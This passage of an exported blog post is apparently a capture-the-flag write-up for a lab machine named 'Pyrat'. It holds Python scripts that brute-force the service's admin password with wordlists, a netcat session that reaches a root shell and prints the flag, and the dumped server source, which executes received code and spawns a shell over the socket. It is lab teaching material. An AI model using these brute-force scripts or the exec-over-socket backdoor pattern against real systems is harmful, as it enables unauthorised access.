response.decode()\n        if &#039;Password&#039; in response:\n            client_socket.sendall(password)\n\n            response = client_socket.recv(1024)\n            response = response.decode()\n\n        if not &#039;Password&#039; in response:\n            print(&#039;Password:&#039;, password)\n\n    except ConnectionRefusedError:\n        print(&quot;Connection was refused. 
Is the server running?&quot;)\n    finally:\n        # Close the socket connection\n        client_socket.close()\n\ndef test_creds():\n    from threading import Thread\n    wordlist = &#039;\/usr\/share\/seclists\/Passwords\/Leaked-Databases\/rockyou.txt&#039;\n    passwords = read_wordlist_from_file(wordlist)\n    threads = []\n    for password in passwords:\n        thread = Thread(target=test_this, args=(password,))\n        thread.start()\n        threads.append(thread)\n        if len(threads) &gt;= 30:\n            for thread in threads:\n                thread.join()\n            threads = []<\/code><\/pre>\n<p>According to the author, a small modification is all it takes to brute-force it, but I did not get it working. The brute-forced result is:<\/p>\n<pre><code class=\"language-text\">admin\nseptember<\/code><\/pre>\n<p>After brute-forcing it, try connecting to get a root shell:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/pyrat]\n\u2514\u2500# nc 192.168.0.179 8000\nadmin\nPassword:\nseptember\nWelcome Admin!!! 
Type &quot;shell&quot; to begin\nshell\n# whoami;id\nwhoami;id\nroot\nuid=0(root) gid=0(root) groups=0(root)\n# ls -la\nls -la\ntotal 68\ndrwxrwx---  7 root root 4096 Jan  4 08:32 .\ndrwxr-xr-x 18 root root 4096 Dec 22 13:22 ..\nlrwxrwxrwx  1 root root    9 Jun  2  2023 .bash_history -&gt; \/dev\/null\n-rwxrwx---  1 root root 3230 Jun 21  2023 .bashrc\ndrwx------  2 root root 4096 Jun 21  2023 .cache\ndrwx------  3 root root 4096 Dec 22 14:21 .config\n-rw-r--r--  1 root root   29 Jun 21  2023 .gitconfig\ndrwxr-xr-x  3 root root 4096 Jan  4 08:32 .local\n-rwxrwx---  1 root root  161 Dec  5  2019 .profile\n-rwxrwx---  1 root root 5340 Dec 22 14:49 pyrat.py\n-rw-r-----  1 root root   33 Jun 15  2023 root.txt\n-rw-r--r--  1 root root   75 Jun 15  2023 .selected_editor\ndrwxrwx---  3 root root 4096 Jun  2  2023 snap\ndrwxrwx---  2 root root 4096 Jun  2  2023 .ssh\n-rw-rw-rw-  1 root root 9204 Dec 22 14:49 .viminfo\n# cat root.txt\ncat root.txt\nba5ed03e9e74bb98054438480165e221\n# cat pyrat.py\ncat pyrat.py\nimport socket\nimport threading\nimport sys\nfrom io import StringIO\nimport datetime\nimport os\nimport getpass\nimport multiprocessing\n\nmanager = multiprocessing.Manager()\nadmins = manager.list()\n\ndef handle_client(client_socket, client_address):\n    uid = os.getuid()\n    uid_changed = False\n\n    while True:\n        # Receive data from the client\n        try:\n            data = client_socket.recv(1024).decode(&quot;utf-8&quot;)\n        except Exception as e:\n            # Send the exception message back to the client\n            send_data(client_socket, e)\n            continue\n\n        if not data:\n            continue\n\n        if is_http(data):\n            send_data(client_socket, fake_http())\n            continue\n\n        switch_case(client_socket, str(data).strip())\n\n    # Close the connection with the client\n    remove_socket(client_socket)\n\ndef switch_case(client_socket, data):\n    if data == &#039;admin&#039;:\n        
get_admin(client_socket)\n    else:\n        # Check socket is admin and downgrade if is not aprooved\n        uid = os.getuid()\n        if (uid == 0) and (str(client_socket) not in admins):\n            change_uid()\n\n        if data == &#039;shell&#039;:\n            shell(client_socket)\n        else:\n            exec_python(client_socket, data)\n\n# Tries to execute the random data with Python\ndef exec_python(client_socket, data):\n    try:\n        # Redirect stdout to capture the printed output\n        captured_output = StringIO()\n        sys.stdout = captured_output\n\n        # Execute the received data as code\n        exec(data)\n\n        # Get the captured output\n        exec_output = captured_output.getvalue()\n\n        # Send the result back to the client\n        send_data(client_socket, exec_output)\n    except Exception as e:\n        # Send the exception message back to the client\n        send_data(client_socket, e)\n    finally:\n        # Reset stdout to the default\n        sys.stdout = sys.__stdout__\n\n# Handles the Admin endpoint\ndef get_admin(client_socket):\n    global admins\n\n    uid = os.getuid()\n    if (uid != 0):\n        send_data(client_socket, &quot;Start a fresh client to begin.&quot;)\n        return\n\n    password = &#039;september&#039;\n\n    for i in range(0, 3):\n        # Ask for Password\n        send_data(client_socket, &quot;Password:&quot;)\n\n        # Receive data from the client\n        try:\n            data = client_socket.recv(1024).decode(&quot;utf-8&quot;)\n        except Exception as e:\n            # Send the exception message back to the client\n            send_data(client_socket, e)\n            pass\n        finally:\n            # Reset stdout to the default\n            sys.stdout = sys.__stdout__\n\n        if data.strip() == password:\n            admins.append(str(client_socket))\n            send_data(client_socket, &#039;Welcome Admin!!! 
Type &quot;shell&quot; to begin&#039;)\n            break\n\ndef shell(client_socket):\n    try:\n        import pty\n        os.dup2(client_socket.fileno(), 0)\n        os.dup2(client_socket.fileno(), 1)\n        os.dup2(client_socket.fileno(), 2)\n        pty.spawn(&quot;\/bin\/sh&quot;)\n    except Exception as e:\n        send_data(client_socket, e)\n\n# Sends data to the clients\ndef send_data(client_socket, data):\n    try:\n        client_socket.sendall((str(data) + &#039;\\n&#039;).encode(&quot;utf-8&quot;))\n    except:\n        remove_socket(client_socket)\n\ndef start_server(host, port):\n    server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n    server_socket.bind((host, port))\n    server_socket.listen(5)\n    print(f&quot;Server listening on {host}:{port}...&quot;)\n\n    while True:\n        client_socket, client_address = server_socket.accept()\n        # Start a new process to handle the client\n        p = multiprocessing.Process(target=handle_client, args=(client_socket, client_address))\n        p.start()\n\ndef remove_socket(client_socket):\n    client_socket.close()\n    global admins\n\n    # Replace the original and admins lists\n    admins = admins._getvalue()\n\n    try:\n        if str(client_socket) in admins:\n            admins.remove(str(client_socket))\n    except:\n        pass\n\n# Check if the received data is an HTTP request\ndef is_http(data):\n    if (&#039;HTTP&#039; in data) and (&#039;Host:&#039; in data):\n        return True\n    return False\n\n# Sends a fake Python HTTP Server Banner\ndef fake_http():\n    try:\n        # Get the current date and time\n        current_datetime = datetime.datetime.now()\n\n        # Format the date and time according to the desired format\n        formatted_datetime = current_datetime.strftime(&quot;%a %b %d %H:%M:%S %Z %Y&quot;)\n        banner = &quot;&quot;&quot;\nHTTP\/1.0 200 OK\nServer: SimpleHTTP\/0.6 Python\/3.11.2\nDate: 
{date}&quot;&quot;&quot;.format(date=formatted_datetime) + &quot;&quot;&quot;\nContent-type: text\/html; charset=utf-8\nContent-Length: 27\n\nTry a more basic connection!\n&quot;&quot;&quot;\n        return banner[1:]\n    except:\n        return &#039;HTTP\/1.0 200 OK&#039;\n\ndef change_uid():\n    uid = os.getuid()\n\n    if uid == 0:\n        # Make python code execution run as user 33 (www-data)\n        euid = 33\n        groups = os.getgroups()\n        if 0 in groups:\n            groups.remove(0)\n        os.setgroups(groups)\n        os.setgid(euid)\n        os.setuid(euid)\n\n# MAIN\nif __name__ == &quot;__main__&quot;:\n    host = &quot;0.0.0.0&quot;  # Replace with your desired IP address\n    port = 8000  # Replace with your desired port number\n\n    try:\n        start_server(host, port)\n    except KeyboardInterrupt:\n        print(&#039;Shutting Down...&#039;)\n        sys.exit(1)<\/code><\/pre>\n<h2>Writing the Script<\/h2>\n<p>I asked <code>rpj7<\/code> for advice:<\/p>\n<pre><code class=\"language-python\">import socket\n\nHOST = &quot;10.0.0.108&quot; # Server ip address\nPORT = 8000  # The port used by the server\n\ndef connectdostuff(fndata):\n    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n        s.connect((HOST, PORT))\n        s.sendall(b&quot;admin\\n&quot;)\n        data = s.recv(1024)\n        s.sendall(bytes(fndata+&quot;\\n&quot;,encoding=&quot;ascii&quot;))\n        data = s.recv(1024)\n        s.close()\n    print(f&quot; {data!r}&quot;)\n\nfile1 = open(&#039;\/usr\/share\/wordlists\/metasploit\/unix_passwords.txt&#039;, &#039;r&#039;)\nLines = file1.readlines()\ncount=0\nfor line in Lines:\n    count += 1\n    print(&quot;Line{}: {}&quot;.format(count, line.strip()))\n    connectdostuff(line)<\/code><\/pre>\n<p>A normal response from the program should look like this:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404171917240.png\" alt=\"image-20240417190516847\" \/><\/p>\n<p>I tried using Python&#039;s pwntools library to connect and brute-force it, but that failed. <code>rpj7<\/code>&#039;s script, on the other hand, ran successfully with no trouble at all.<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404171917727.png\" alt=\"image-20240417191500925\" \/><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Pyrat Information Gathering Port Scan nmap -sCV -p 1-65535 172.20.10.13 PORT  
[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-580","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/580","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=580"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/580\/revisions"}],"predecessor-version":[{"id":581,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/580\/revisions\/581"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=580"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=580"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=580"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}